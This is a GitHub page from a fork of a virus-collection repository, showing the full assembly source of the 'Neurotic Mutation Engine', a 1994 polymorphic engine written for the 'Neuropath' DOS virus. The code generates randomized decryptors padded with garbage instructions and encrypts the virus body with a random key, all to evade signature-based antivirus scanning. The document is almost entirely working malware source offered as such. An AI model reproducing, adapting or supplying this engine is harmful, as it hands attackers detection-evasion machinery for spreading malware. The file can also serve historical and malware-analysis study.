forked from guitmz/virii
-
Notifications
You must be signed in to change notification settings - Fork 0
/
NEUROENG.ASM
executable file
·284 lines (241 loc) · 7.99 KB
/
NEUROENG.ASM
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
; Neurotic Mutation Engine v1.00 for Neuropath
; by MnemoniX 1994
engine proc near
call randomize
get_reg_1:
mov ax,7 ; counter register
call _random
inc ax
cmp al,4
je get_reg_1
cmp al,5
ja get_reg_1
mov ds:reg_1,al
push di ; save this
push ax
call garbage_dump ; crap
pop ax
add al,0B8h ; store MOV instruction
stosb
mov ax,cx
stosw
call garbage_dump ; more crap
mov al,0BFh
stosb
push di ; use this later
stosw
call garbage_dump ; even more crap
mov ax,0F78Bh
stosw
push di ; use this later too
call garbage_dump ; more crap
mov al,0ADh ; a LODSW
stosb
call garbage_dump ; yet more crap
mov al,2
call _random
test al,al
je add_it
mov al,35h
mov bl,al
je decryptor
add_it:
mov al,5
mov bl,2Dh
decryptor:
stosb
mov ds:encrypt_act,bl ; for encryption
mov ax,-1
call _random
stosw
mov ds:encrypt_key,ax ; for encryption
call garbage_dump ; just pilin' on the crap
mov al,0ABh ; a STOSW
stosb
call garbage_dump ; the crap continues ...
mov al,ds:reg_1 ; decrement counter
add al,48h
mov ah,9Ch ; and a PUSHF
stosw
call garbage_dump ; C-R-A-P ...
mov ax,749Dh ; a POPF and JZ
stosw
mov ax,4
call _random ; use later
mov bx,ax
add al,3
stosb
mov al,0E9h ; a JMP
stosb
pop ax ; use LODSW offset
sub ax,di
dec ax
dec ax
stosw
add di,bx ; fix up DI
pop bx ; now fix up offset value
pop bp
sub bp,di
neg bp
push bp ; size of decryptor - for l8r
add bp,dx
mov es:[bx],bp
push cx
push si
mov si,offset one_byters ; swap one-byte instructions
mov ax,7 ; around for variety
call _random
mov bx,ax
mov al,7
call _random
mov ah,[bx+si]
mov bl,al
mov [bx+si],ah
pop si
; now we encrypt
encrypt_it:
lodsw
encrypt_act db 0
encrypt_key dw 0
stosw
loop encrypt_it
pop cx
pop dx
add cx,dx
ret
reg_1 db 0
rnd_seed_1 dw 0
rnd_seed_2 dw 0
garbage_dump:
mov ax,7 ; garbage instructions
call _random
add ax,5
push cx
mov cx,ax
dump_it:
; El Basurero - "The GarbageMan"
mov ax,8
call _random
cmp al,2
jb next_one
je garbage_1 ; a MOV ??,AX
cmp al,3
je garbage_2 ; operate ??,AX
cmp al,4
je garbage_3 ; CMP or TEST AX/AL,??
cmp al,5 ; a few little instructions
jae garbage_4
next_one:
loop dump_it
pop cx
ret
garbage_1:
mov al,8Bh
stosb
call get_mov_reg
shl ax,1
shl ax,1
shl ax,1
add al,0C0h
stosb
jmp next_one
garbage_2:
mov al,8
call _random
shl ax,1
shl ax,1
shl ax,1
add al,3
stosb
call get_mov_reg
shl ax,1
shl ax,1
shl ax,1
add al,0C0h
stosb
jmp next_one
garbage_3:
mov al,2
call _random
test al,al
je a_cmp
mov al,0A9h
jmp storage
a_cmp:
mov al,3Dh
storage:
stosb
mov ax,-1
call _random
stosw
jmp next_one
garbage_4:
push cx
mov ax,4
call _random
add ax,3
mov cx,ax
push si
mov bx,offset one_byters
filler_loop:
mov ax,8
call _random
cmp al,7
je make_inc_dec
mov si,ax
mov al,[bx+si]
proceed:
stosb
loop filler_loop
pop si cx
jmp next_one
make_inc_dec:
call get_mov_reg
add al,40h
jmp proceed
get_mov_reg:
mov ax,8
call _random
test al,al
je get_mov_reg
cmp al,4
je get_mov_reg
cmp al,5
ja get_mov_reg
cmp al,reg_1
je get_mov_reg
ret
one_byters:
db 0CCh
stc
clc
cmc
sti
nop
cld
randomize:
push cx dx
xor ah,ah
int 1Ah
mov rnd_seed_1,dx
add dx,cx
mov rnd_seed_2,dx
pop dx cx
ret
_random:
push cx dx ax
add dx,rnd_seed_2
add dx,17
mov ax,dx
xor dx,dx
test ax,ax
je rnd_done
pop cx
div cx
mov ax,dx ; AX now holds our random #
rnd_done:
mov dx,rnd_seed_1
add rnd_seed_2,dx
pop dx cx
ret
engine endp